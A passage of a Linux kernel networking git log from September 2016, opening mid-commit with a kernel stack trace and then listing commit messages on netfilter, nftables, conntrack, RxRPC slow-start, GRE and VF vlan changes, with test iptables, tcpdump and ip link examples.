[ 7858.212748] in_atomic(): 1, irqs_disabled(): 0, pid: 0, name: swapper/0
[ 7858.212881] 2 locks held by swapper/0/0:
[ 7858.213013]  #0:  (((&mrt->ipmr_expire_timer))){+.-...}, at: [<ffffffff810fbbf5>] call_timer_fn+0x5/0x350
[ 7858.213422]  #1:  (mfc_unres_lock){+.....}, at: [<ffffffff8161e005>] ipmr_expire_process+0x25/0x130
[ 7858.213807] CPU: 0 PID: 0 Comm: swapper/0 Not tainted 4.8.0-rc7+ #179
[ 7858.213934] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.7.5-20140531_083030-gandalf 04/01/2014
[ 7858.214108]  0000000000000000 ffff88005b403c50 ffffffff813a7804 0000000000000000
[ 7858.214412]  ffffffff81a1338e ffff88005b403c78 ffffffff810a4a72 ffffffff81a1338e
[ 7858.214716]  000000000000026c 0000000000000000 ffff88005b403ca8 ffffffff810a4b9f
[ 7858.215251] Call Trace:
[ 7858.215412]  <IRQ>  [<ffffffff813a7804>] dump_stack+0x85/0xc1
[ 7858.215662]  [<ffffffff810a4a72>] ___might_sleep+0x192/0x250
[ 7858.215868]  [<ffffffff810a4b9f>] __might_sleep+0x6f/0x100
[ 7858.216072]  [<ffffffff8165bea3>] mutex_lock_nested+0x33/0x4d0
[ 7858.216279]  [<ffffffff815a7a5f>] ? netlink_lookup+0x25f/0x460
[ 7858.216487]  [<ffffffff8157474b>] rtnetlink_rcv+0x1b/0x40
[ 7858.216687]  [<ffffffff815a9a0c>] netlink_unicast+0x19c/0x260
[ 7858.216900]  [<ffffffff81573c70>] rtnl_unicast+0x20/0x30
[ 7858.217128]  [<ffffffff8161cd39>] ipmr_destroy_unres+0xa9/0xf0
[ 7858.217351]  [<ffffffff8161e06f>] ipmr_expire_process+0x8f/0x130
[ 7858.217581]  [<ffffffff8161dfe0>] ? ipmr_net_init+0x180/0x180
[ 7858.217785]  [<ffffffff8161dfe0>] ? ipmr_net_init+0x180/0x180
[ 7858.217990]  [<ffffffff810fbc95>] call_timer_fn+0xa5/0x350
[ 7858.218192]  [<ffffffff810fbbf5>] ? call_timer_fn+0x5/0x350
[ 7858.218415]  [<ffffffff8161dfe0>] ? ipmr_net_init+0x180/0x180
[ 7858.218656]  [<ffffffff810fde10>] run_timer_softirq+0x260/0x640
[ 7858.218865]  [<ffffffff8166379b>] ? __do_softirq+0xbb/0x54f
[ 7858.219068]  [<ffffffff816637c8>] __do_softirq+0xe8/0x54f
[ 7858.219269]  [<ffffffff8107a948>] irq_exit+0xb8/0xc0
[ 7858.219463]  [<ffffffff81663452>] smp_apic_timer_interrupt+0x42/0x50
[ 7858.219678]  [<ffffffff816625bc>] apic_timer_interrupt+0x8c/0xa0
[ 7858.219897]  <EOI>  [<ffffffff81055f16>] ? native_safe_halt+0x6/0x10
[ 7858.220165]  [<ffffffff810d64dd>] ? trace_hardirqs_on+0xd/0x10
[ 7858.220373]  [<ffffffff810298e3>] default_idle+0x23/0x190
[ 7858.220574]  [<ffffffff8102a20f>] arch_cpu_idle+0xf/0x20
[ 7858.220790]  [<ffffffff810c9f8c>] default_idle_call+0x4c/0x60
[ 7858.221016]  [<ffffffff810ca33b>] cpu_startup_entry+0x39b/0x4d0
[ 7858.221257]  [<ffffffff8164f995>] rest_init+0x135/0x140
[ 7858.221469]  [<ffffffff81f83014>] start_kernel+0x50e/0x51b
[ 7858.221670]  [<ffffffff81f82120>] ? early_idt_handler_array+0x120/0x120
[ 7858.221894]  [<ffffffff81f8243f>] x86_64_start_reservations+0x2a/0x2c
[ 7858.222113]  [<ffffffff81f8257c>] x86_64_start_kernel+0x13b/0x14a

Fixes: 2942e90050 ("[RTNETLINK]: Use rtnl_unicast() for rtnetlink unicasts")
Signed-off-by: Nikolay Aleksandrov <nikolay@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-25 23:41:39 -04:00
Pablo Neira Ayuso
f20fbc0717 Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/davem/net-next
Conflicts:
	net/netfilter/core.c
	net/netfilter/nf_tables_netdev.c

Resolve two conflicts before pull request for David's net-next tree:

1) Between c73c248490 ("netfilter: nf_tables_netdev: remove redundant
   ip_hdr assignment") from the net tree and commit ddc8b6027a
   ("netfilter: introduce nft_set_pktinfo_{ipv4, ipv6}_validate()").

2) Between e8bffe0cf9 ("net: Add _nf_(un)register_hooks symbols") and
   Aaron Conole's patches to replace list_head with single linked list.

Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-25 23:34:19 +02:00
Liping Zhang
8cb2a7d566 netfilter: nf_log: get rid of XT_LOG_* macros
nf_log is used by both nftables and iptables, so use XT_LOG_XXX macros
here is not appropriate. Replace them with NF_LOG_XXX.

Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-25 23:16:45 +02:00
Liping Zhang
ff107d2776 netfilter: nft_log: complete NFTA_LOG_FLAGS attr support
NFTA_LOG_FLAGS attribute is already supported, but the related
NF_LOG_XXX flags are not exposed to the userspace. So we cannot
explicitly enable log flags to log uid, tcp sequence, ip options
and so on, i.e. such rule "nft add rule filter output log uid"
is not supported yet.

So move NF_LOG_XXX macro definitions to the uapi/../nf_log.h. In
order to keep consistent with other modules, change NF_LOG_MASK to
refer to all supported log flags. On the other hand, add a new
NF_LOG_DEFAULT_MASK to refer to the original default log flags.

Finally, if user specify the unsupported log flags or NFTA_LOG_GROUP
and NFTA_LOG_FLAGS are set at the same time, report EINVAL to the
userspace.

Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-25 23:16:43 +02:00
Pablo Neira Ayuso
0f3cd9b369 netfilter: nf_tables: add range expression
Inverse ranges != [a,b] are not currently possible because rules are
composites of && operations, and we need to express this:

	data < a || data > b

This patch adds a new range expression. Positive ranges can be already
through two cmp expressions:

	cmp(sreg, data, >=)
	cmp(sreg, data, <=)

This new range expression provides an alternative way to express this.

Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-25 23:16:42 +02:00
KOVACS Krisztian
7a682575ad netfilter: xt_socket: fix transparent match for IPv6 request sockets
The introduction of TCP_NEW_SYN_RECV state, and the addition of request
sockets to the ehash table seems to have broken the --transparent option
of the socket match for IPv6 (around commit a9407000).

Now that the socket lookup finds the TCP_NEW_SYN_RECV socket instead of the
listener, the --transparent option tries to match on the no_srccheck flag
of the request socket.

Unfortunately, that flag was only set for IPv4 sockets in tcp_v4_init_req()
by copying the transparent flag of the listener socket. This effectively
causes '-m socket --transparent' not match on the ACK packet sent by the
client in a TCP handshake.

Based on the suggestion from Eric Dumazet, this change moves the code
initializing no_srccheck to tcp_conn_request(), rendering the above
scenario working again.

Fixes: a940700003 ("netfilter: xt_socket: prepare for TCP_NEW_SYN_RECV support")
Signed-off-by: Alex Badics <alex.badics@balabit.com>
Signed-off-by: KOVACS Krisztian <hidden@balabit.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-25 23:16:11 +02:00
Florian Westphal
58e207e498 netfilter: evict stale entries when user reads /proc/net/nf_conntrack
Fabian reports a possible conntrack memory leak (could not reproduce so
far), however, one minor issue can be easily resolved:

> cat /proc/net/nf_conntrack | wc -l = 5
> 4 minutes required to clean up the table.

We should not report those timed-out entries to the user in first place.
And instead of just skipping those timed-out entries while iterating over
the table we can also zap them (we already do this during ctnetlink
walks, but I forgot about the /proc interface).

Fixes: f330a7fdbe ("netfilter: conntrack: get rid of conntrack timer")
Reported-by: Fabian Frederick <fabf@skynet.be>
Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-25 14:54:08 +02:00
Vishwanath Pai
11d5f15723 netfilter: xt_hashlimit: Create revision 2 to support higher pps rates
Create a new revision for the hashlimit iptables extension module. Rev 2
will support higher pps of upto 1 million, Version 1 supports only 10k.

To support this we have to increase the size of the variables avg and
burst in hashlimit_cfg to 64-bit. Create two new structs hashlimit_cfg2
and xt_hashlimit_mtinfo2 and also create newer versions of all the
functions for match, checkentry and destroy.

Some of the functions like hashlimit_mt, hashlimit_mt_check etc are very
similar in both rev1 and rev2 with only minor changes, so I have split
those functions and moved all the common code to a *_common function.

Signed-off-by: Vishwanath Pai <vpai@akamai.com>
Signed-off-by: Joshua Hunt <johunt@akamai.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-25 14:54:06 +02:00
Vishwanath Pai
0dc60a4546 netfilter: xt_hashlimit: Prepare for revision 2
I am planning to add a revision 2 for the hashlimit xtables module to
support higher packets per second rates. This patch renames all the
functions and variables related to revision 1 by adding _v1 at the
end of the names.

Signed-off-by: Vishwanath Pai <vpai@akamai.com>
Signed-off-by: Joshua Hunt <johunt@akamai.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-25 14:54:05 +02:00
Liping Zhang
7bfdde7045 netfilter: nft_ct: report error if mark and dir specified simultaneously
NFT_CT_MARK is unrelated to direction, so if NFTA_CT_DIRECTION attr is
specified, report EINVAL to the userspace. This validation check was
already done at nft_ct_get_init, but we missed it in nft_ct_set_init.

Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-25 14:54:04 +02:00
Liping Zhang
d767ff2c84 netfilter: nft_ct: unnecessary to require dir when use ct l3proto/protocol
Currently, if the user want to match ct l3proto, we must specify the
direction, for example:
  # nft add rule filter input ct original l3proto ipv4
                                 ^^^^^^^^
Otherwise, error message will be reported:
  # nft add rule filter input ct l3proto ipv4
  nft add rule filter input ct l3proto ipv4
  <cmdline>:1:1-38: Error: Could not process rule: Invalid argument
  add rule filter input ct l3proto ipv4
  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Actually, there's no need to require NFTA_CT_DIRECTION attr, because
ct l3proto and protocol are unrelated to direction.

And for compatibility, even if the user specify the NFTA_CT_DIRECTION
attr, do not report error, just skip it.

Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-25 14:54:02 +02:00
Gao Feng
8d11350f5f netfilter: seqadj: Fix the wrong ack adjust for the RST packet without ack
It is valid that the TCP RST packet which does not set ack flag, and bytes
of ack number are zero. But current seqadj codes would adjust the "0" ack
to invalid ack number. Actually seqadj need to check the ack flag before
adjust it for these RST packets.

The following is my test case

client is 10.26.98.245, and add one iptable rule:
iptables  -I INPUT -p tcp --sport 12345 -m connbytes --connbytes 2:
--connbytes-dir reply --connbytes-mode packets -j REJECT --reject-with
tcp-reset
This iptables rule could generate on TCP RST without ack flag.

server:10.172.135.55
Enable the synproxy with seqadjust by the following iptables rules
iptables -t raw -A PREROUTING -i eth0 -p tcp -d 10.172.135.55 --dport 12345
-m tcp --syn -j CT --notrack

iptables -A INPUT -i eth0 -p tcp -d 10.172.135.55 --dport 12345 -m conntrack
--ctstate INVALID,UNTRACKED -j SYNPROXY --sack-perm --timestamp --wscale 7
--mss 1460
iptables -A OUTPUT -o eth0 -p tcp -s 10.172.135.55 --sport 12345 -m conntrack
--ctstate INVALID,UNTRACKED -m tcp --tcp-flags SYN,RST,ACK SYN,ACK -j ACCEPT

The following is my test result.

1. packet trace on client
root@routers:/tmp# tcpdump -i eth0 tcp port 12345 -n
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
IP 10.26.98.245.45154 > 10.172.135.55.12345: Flags [S], seq 3695959829,
win 29200, options [mss 1460,sackOK,TS val 452367884 ecr 0,nop,wscale 7],
length 0
IP 10.172.135.55.12345 > 10.26.98.245.45154: Flags [S.], seq 546723266,
ack 3695959830, win 0, options [mss 1460,sackOK,TS val 15643479 ecr 452367884,
nop,wscale 7], length 0
IP 10.26.98.245.45154 > 10.172.135.55.12345: Flags [.], ack 1, win 229,
options [nop,nop,TS val 452367885 ecr 15643479], length 0
IP 10.172.135.55.12345 > 10.26.98.245.45154: Flags [.], ack 1, win 226,
options [nop,nop,TS val 15643479 ecr 452367885], length 0
IP 10.26.98.245.45154 > 10.172.135.55.12345: Flags [R], seq 3695959830,
win 0, length 0

2. seqadj log on server
[62873.867319] Adjusting sequence number from 602341895->546723267,
ack from 3695959830->3695959830
[62873.867644] Adjusting sequence number from 602341895->546723267,
ack from 3695959830->3695959830
[62873.869040] Adjusting sequence number from 3695959830->3695959830,
ack from 0->55618628

To summarize, it is clear that the seqadj codes adjust the 0 ack when receive
one TCP RST packet without ack.

Signed-off-by: Gao Feng <fgao@ikuai8.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-25 14:54:01 +02:00
Aaron Conole
e3b37f11e6 netfilter: replace list_head with single linked list
The netfilter hook list never uses the prev pointer, and so can be trimmed to
be a simple singly-linked list.

In addition to having a more light weight structure for hook traversal,
struct net becomes 5568 bytes (down from 6400) and struct net_device becomes
2176 bytes (down from 2240).

Signed-off-by: Aaron Conole <aconole@bytheb.org>
Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-25 14:38:48 +02:00
David S. Miller
21445c91dc RxRPC rewrite
-----BEGIN PGP SIGNATURE-----
 
 iQIVAwUAV+cFjvSw1s6N8H32AQIRyBAAkedosPtgW2JBsCEgvYcfQuSg36gBc0Km
 ozAcbzbWA50P+WSdIq+GhcnQLo3OWRsaGKp6vIrgDtJjgKZXQJyOwzlMm6xFf0A+
 Z7NtnWHuSZ90xcxVHCqXRqdNGqwmve8VTNWUbQmZpKIc6d6wNiO3rsg/WFTshroz
 FSMf67PsOf5i1hCR8x+3dPlSdkIjH/hWh3wyEmmnPjDPq49twnKkaklLylf9V9NO
 DGuW+/+wxkht3ylPRxGD7IQ1t0eA9iyU59Zk7SizuEmzrUNQrqQ3RM8ZsBe/cAA8
 VEr+RVOvVoxWUYnZbYEvwfwuKQIWhX5ptt6VLQH7sLJlR8AiMIV6/K47ZqK7ILoI
 xBlkQAxI5K4SdFkOux7JPZ31yrIQMTl5xAUkbZxQOFsIPh237mtvGatUIKYcKyi6
 uURrPtm13C1uqBZ+sfiUcjq82YdnLkliTUvUncarjZjUAddncQaSOwxcXZGCxThE
 24JAzBAJfWLn0760SzNDZytcWSU4tpLVI3X+FpujtaF447DfjzJ/NdyBXWXbmOyY
 ubX3pk0UOHVj5kMr7WXK5c+txOI2qIH4aV8cYZpVsFAXp63WjqgfRvRbNhICUA86
 3v2M/qLgAEFR3rYh9i+mm0D74aug0+NwST/QDtf5dYFiH53+BteEpQqd/kcYxt8m
 6bWwKxzUQG0=
 =PTOG
 -----END PGP SIGNATURE-----

Merge tag 'rxrpc-rewrite-20160924' of git://git.kernel.org/pub/scm/linux/kernel/git/dhowells/linux-fs

David Howells says:

====================
rxrpc: Implement slow-start and other bits

This set of patches implements the RxRPC slow-start feature for AF_RXRPC to
improve performance and handling of occasional packet loss.  This is more or
less the same as TCP slow start [RFC 5681].  Firstly, there are some ACK
generation improvements:

 (1) Send ACKs regularly to apprise the peer of our state so that they can do
     congestion management of their own.

 (2) Send an ACK when we fill in a hole in the buffer so that the peer can
     find out that we did this thus forestalling retransmission.

 (3) Note the final DATA packet's serial number in the final ACK for
     correlation purposes.

and a couple of bug fixes:

 (4) Reinitialise the ACK state and clear the ACK and resend timers upon
     entering the client reply reception phase to kill off any pending probe
     ACKs.

 (5) Delay the resend timer to allow for nsec->jiffies conversion errors.

and then there's the slow-start pieces:

 (6) Summarise an ACK.

 (7) Schedule a PING or IDLE ACK if the reply to a client call is overdue to
     try and find out what happened to it.

 (8) Implement the slow start feature.
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-25 05:56:05 -04:00
Lance Richardson
c2675de447 gre: use nla_get_be32() to extract flowinfo
Eliminate a sparse endianness mismatch warning, use nla_get_be32() to
extract a __be32 value instead of nla_get_u32().

Signed-off-by: Lance Richardson <lrichard@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-24 20:07:44 -04:00
David Howells
57494343cb rxrpc: Implement slow-start
Implement RxRPC slow-start, which is similar to RFC 5681 for TCP.  A
tracepoint is added to log the state of the congestion management algorithm
and the decisions it makes.

Notes:

 (1) Since we send fixed-size DATA packets (apart from the final packet in
     each phase), counters and calculations are in terms of packets rather
     than bytes.

 (2) The ACK packet carries the equivalent of TCP SACK.

 (3) The FLIGHT_SIZE calculation in RFC 5681 doesn't seem particularly
     suited to SACK of a small number of packets.  It seems that, almost
     inevitably, by the time three 'duplicate' ACKs have been seen, we have
     narrowed the loss down to one or two missing packets, and the
     FLIGHT_SIZE calculation ends up as 2.

 (4) In rxrpc_resend(), if there was no data that apparently needed
     retransmission, we transmit a PING ACK to ask the peer to tell us what
     its Rx window state is.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-24 23:49:46 +01:00
David Howells
0d967960d3 rxrpc: Schedule an ACK if the reply to a client call appears overdue
If we've sent all the request data in a client call but haven't seen any
sign of the reply data yet, schedule an ACK to be sent to the server to
find out if the reply data got lost.

If the server hasn't yet hard-ACK'd the request data, we send a PING ACK to
demand a response to find out whether we need to retransmit.

If the server says it has received all of the data, we send an IDLE ACK to
tell the server that we haven't received anything in the receive phase as
yet.

To make this work, a non-immediate PING ACK must carry a delay.  I've chosen
the same as the IDLE ACK for the moment.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-24 23:49:46 +01:00
David Howells
31a1b98950 rxrpc: Generate a summary of the ACK state for later use
Generate a summary of the Tx buffer packet state when an ACK is received
for use in a later patch that does congestion management.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-24 23:49:46 +01:00
David Howells
df0562a72d rxrpc: Delay the resend timer to allow for nsec->jiffies conv error
When determining the resend timer value, we have a value in nsec but the
timer is in jiffies which may be a million or more times more coarse.
nsecs_to_jiffies() rounds down - which means that the resend timeout
expressed as jiffies is very likely earlier than the one expressed as
nanoseconds from which it was derived.

The problem is that rxrpc_resend() gets triggered by the timer, but can't
then find anything to resend yet.  It sets the timer again - but gets
kicked off immediately again and again until the nanosecond-based expiry
time is reached and we actually retransmit.

Fix this by adding 1 to the jiffies-based resend_at value to counteract the
rounding and make sure that the timer happens after the nanosecond-based
expiry is passed.

Alternatives would be to adjust the timestamp on the packets to align
with the jiffie scale or to switch back to using jiffie-timestamps.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-24 23:49:46 +01:00
David Howells
dd7c1ee59a rxrpc: Reinitialise the call ACK and timer state for client reply phase
Clear the ACK reason, ACK timer and resend timer when entering the client
reply phase when the first DATA packet is received.  New ACKs will be
proposed once the data is queued.

The resend timer is no longer relevant and we need to cancel ACKs scheduled
to probe for a lost reply.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-24 23:49:46 +01:00
David Howells
b69d94d799 rxrpc: Include the last reply DATA serial number in the final ACK
In a client call, include the serial number of the last DATA packet of the
reply in the final ACK.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-24 23:49:46 +01:00
David Howells
a7056c5ba6 rxrpc: Send an immediate ACK if we fill in a hole
Send an immediate ACK if we fill in a hole in the buffer left by an
out-of-sequence packet.  This may allow the congestion management in the peer
to avoid a retransmission if packets got reordered on the wire.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-24 23:49:46 +01:00
Aaron Conole
d4bb5caa9c netfilter: Only allow sane values in nf_register_net_hook
This commit adds an upfront check for sane values to be passed when
registering a netfilter hook.  This will be used in a future patch for a
simplified hook list traversal.

Signed-off-by: Aaron Conole <aconole@bytheb.org>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-24 21:30:19 +02:00
Aaron Conole
e2361cb90a netfilter: Remove explicit rcu_read_lock in nf_hook_slow
All of the callers of nf_hook_slow already hold the rcu_read_lock, so this
cleanup removes the recursive call.  This is just a cleanup, as the locking
code gracefully handles this situation.

Signed-off-by: Aaron Conole <aconole@bytheb.org>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-24 21:29:53 +02:00
Aaron Conole
2c1e2703ff netfilter: call nf_hook_ingress with rcu_read_lock
This commit ensures that the rcu read-side lock is held while the
ingress hook is called.  This ensures that a call to nf_hook_slow (and
ultimately nf_ingress) will be read protected.

Signed-off-by: Aaron Conole <aconole@bytheb.org>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-24 21:25:49 +02:00
Florian Westphal
c5136b15ea netfilter: bridge: add and use br_nf_hook_thresh
This replaces the last uses of NF_HOOK_THRESH().
Followup patch will remove it and rename nf_hook_thresh.

The reason is that inet (non-bridge) netfilter no longer invokes the
hooks from hooks, so we do no longer need the thresh value to skip hooks
with a lower priority.

The bridge netfilter however may need to do this. br_nf_hook_thresh is a
wrapper that is supposed to do this, i.e. only call hooks with a
priority that exceeds NF_BR_PRI_BRNF.

It's used only in the recursion cases of br_netfilter.  It invokes
nf_hook_slow while holding an rcu read-side critical section to make a
future cleanup simpler.

Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: Aaron Conole <aconole@bytheb.org>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-24 21:25:48 +02:00
Gao Feng
50f4c7b73f netfilter: xt_TCPMSS: Refactor the codes to decrease one condition check and more readable
The origin codes perform two condition checks with dst_mtu(skb_dst(skb))
and in_mtu. And the last statement is "min(dst_mtu(skb_dst(skb)),
in_mtu) - minlen". It may let reader think about how about the result.
Would it be negative.

Now assign the result of min(dst_mtu(skb_dst(skb)), in_mtu) to a new
variable, then only perform one condition check, and it is more readable.

Signed-off-by: Gao Feng <fgao@ikuai8.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-24 21:13:21 +02:00
David Howells
805b21b929 rxrpc: Send an ACK after every few DATA packets we receive
Send an ACK if we haven't sent one for the last two packets we've received.
This keeps the other end apprised of where we've got to - which is
important if they're doing slow-start.

We do this in recvmsg so that we can dispatch a packet directly without the
need to wake up the background thread.

This should possibly be made configurable in future.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-24 18:05:26 +01:00
Lance Richardson
db32e4e49c ip6_gre: fix flowi6_proto value in ip6gre_xmit_other()
Similar to commit 3be07244b7 ("ip6_gre: fix flowi6_proto value in
xmit path"), set flowi6_proto to IPPROTO_GRE for output route lookup.

Up until now, ip6gre_xmit_other() has set flowi6_proto to a bogus value.
This affected output route lookup for packets sent on an ip6gretap device
in cases where routing was dependent on the value of flowi6_proto.

Since the correct proto is already set in the tunnel flowi6 template via
commit 252f3f5a11 ("ip6_gre: Set flowi6_proto as IPPROTO_GRE in xmit
path."), simply delete the line setting the incorrect flowi6_proto value.

Suggested-by: Jiri Benc <jbenc@redhat.com>
Fixes: c12b395a46 ("gre: Support GRE over IPv6")
Reviewed-by: Shmulik Ladkani <shmulik.ladkani@gmail.com>
Signed-off-by: Lance Richardson <lrichard@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-24 09:44:31 -04:00
David S. Miller
2a9aa41fd2 RxRPC rewrite
-----BEGIN PGP SIGNATURE-----
 
 iQIVAwUAV+VA9/Sw1s6N8H32AQJufQ//bP1Aq6Ej+3km0o+S1w2lEl7kc1Gnown+
 PLKecg73rtMLEXDCJPKrh/OjGBX1GFaPC5HXWF/4TRav3/qjsi2/P7MSIYbt8ZAk
 0kVcdpIU1RWrPFt0tdhxTDSgPMhRWaKJTFV0CwQgnCqeyrVX44syx42B941Wsgcs
 N/6ANRr1qFLTwT1LKD0EhRWxnds1YI9WPgF5huaAn5RHpymCynwxsxyTDdU+NL0j
 YE75o5rjUzAZzMk5xrTjO8yd7xjUfjO7xT/CzjjVfXB4TOBmYExfOrLNZX0vOPPr
 LBOj3LTLwklWtx5/RJGe3A4y1+yfiUYGTu90ArARHUxP6AMwnxztvjuy2MQvBOgP
 xTlHcEOPoHrxxfIGdJH/0NRl1zgn6IF2lFOH3EgRcw8hzMdFp46AXV74ckst1vOQ
 LsqTbhndG2vkVFV8uZCZO7om0HRbpxbvy6+hEakdZ6k9kJA3amezS6Q8wiXxGhAE
 0wBns3XI/75Zd7QyXRkcHl3iUqS5uW0dKmAqitIlgf3CUsr4cZFlHO8IDD3rkTFD
 WbnvFhaL9Ee5IQjbsHgyzqPSI7sUJUYG1xBAz8wIWnjD0bGu5b/QzgdBSCVIFJ3e
 bNvpe1B6HEHj0EyIj1wK2H8311Y4lPNeJlOj7BDUqqRIZW8vviG26MTGML6GnJwU
 L35wa/s4ebo=
 =+8HJ
 -----END PGP SIGNATURE-----

Merge tag 'rxrpc-rewrite-20160923' of git://git.kernel.org/pub/scm/linux/kernel/git/dhowells/linux-fs

David Howells says:

====================
rxrpc: Bug fixes and tracepoints

Here are a bunch of bug fixes:

 (1) Need to set the timestamp on a Tx packet before queueing it to avoid
     trouble with the retransmission function.

 (2) Don't send an ACK at the end of the service reply transmission; it's
     the responsibility of the client to send an ACK to close the call.
     The service can resend the last DATA packet or send a PING ACK.

 (3) Wake sendmsg() on abnormal call termination.

 (4) Use ktime_add_ms() not ktime_add_ns() to add millisecond offsets.

 (5) Use before_eq() & co. to compare serial numbers (which may wrap).

 (6) Start the resend timer on DATA packet transmission.

 (7) Don't accidentally cancel a retransmission upon receiving a NACK.

 (8) Fix the call timer setting function to deal with timeouts that are now
     or past.

 (9) Don't use a flag to communicate the presence of the last packet in the
     Tx buffer from sendmsg to the input routines where ACK and DATA
     reception is handled.  The problem is that there's a window between
     queueing the last packet for transmission and setting the flag in
     which ACKs or reply DATA packets can arrive, causing apparent state
     machine violation issues.

     Instead use the annotation buffer to mark the last packet and pick up
     and set the flag in the input routines.

(10) Don't call the tx_ack tracepoint and don't allocate a serial number if
     someone else nicked the ACK we were about to transmit.

There are also new tracepoints and one altered tracepoint used to track
down the above bugs:

(11) Call timer tracepoint.

(12) Data Tx tracepoint (and adjustments to ACK tracepoint).

(13) Injected Rx packet loss tracepoint.

(14) Ack proposal tracepoint.

(15) Retransmission selection tracepoint.
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-24 08:24:19 -04:00
David S. Miller
1678c1134f Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next
Steffen Klassert says:

====================
pull request (net-next): ipsec-next 2016-09-23

Only two patches this time:

1) Fix a comment reference to struct xfrm_replay_state_esn.
   From Richard Guy Briggs.

2) Convert xfrm_state_lookup to rcu, we don't need the
   xfrm_state_lock anymore in the input path.
   From Florian Westphal.

Please pull or let me know if there are problems.
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-24 08:18:19 -04:00
Moshe Shemesh
79aab093a0 net: Update API for VF vlan protocol 802.1ad support
Introduce new rtnl UAPI that exposes a list of vlans per VF, giving
the ability for user-space application to specify it for the VF, as an
option to support 802.1ad.
We adjusted IP Link tool to support this option.

For future use cases, the new UAPI supports multiple vlans. For now we
limit the list size to a single vlan in kernel.
Add IFLA_VF_VLAN_LIST in addition to IFLA_VF_VLAN to keep backward
compatibility with older versions of IP Link tool.

Add a vlan protocol parameter to the ndo_set_vf_vlan callback.
We kept 802.1Q as the drivers' default vlan protocol.
Suitable ip link tool command examples:
  Set vf vlan protocol 802.1ad:
    ip link set eth0 vf 1 vlan 100 proto 802.1ad
  Set vf to VST (802.1Q) mode:
    ip link set eth0 vf 1 vlan 100 proto 802.1Q
  Or by omitting the new parameter
    ip link set eth0 vf 1 vlan 100

Signed-off-by: Moshe Shemesh <moshe@mellanox.com>
Signed-off-by: Tariq Toukan <tariqt@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-24 08:01:26 -04:00
Arnd Bergmann
2ed6afdee7 netns: move {inc,dec}_net_namespaces into #ifdef
With the newly enforced limit on the number of namespaces,
we get a build warning if CONFIG_NETNS is disabled:

net/core/net_namespace.c:273:13: error: 'dec_net_namespaces' defined but not used [-Werror=unused-function]
net/core/net_namespace.c:268:24: error: 'inc_net_namespaces' defined but not used [-Werror=unused-function]

This moves the two added functions inside the #ifdef that guards
their callers.

Fixes: 703286608a ("netns: Add a limit on the number of net namespaces")
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Signed-off-by: Eric W. Biederman <ebiederm@xmission.com>
2016-09-23 13:39:43 -05:00
Christoph Hellwig
ed082d36a7 IB/core: add support to create a unsafe global rkey to ib_create_pd
Instead of exposing ib_get_dma_mr to ULPs and letting them use it more or
less unchecked, this moves the capability of creating a global rkey into
the RDMA core, where it can be easily audited.  It also prints a warning
everytime this feature is used as well.

Signed-off-by: Christoph Hellwig <hch@lst.de>
Reviewed-by: Sagi Grimberg <sagi@grimberg.me>
Reviewed-by: Jason Gunthorpe <jgunthorpe@obsidianresearch.com>
Reviewed-by: Steve Wise <swise@opengridcomputing.com>
Signed-off-by: Doug Ledford <dledford@redhat.com>
2016-09-23 13:47:44 -04:00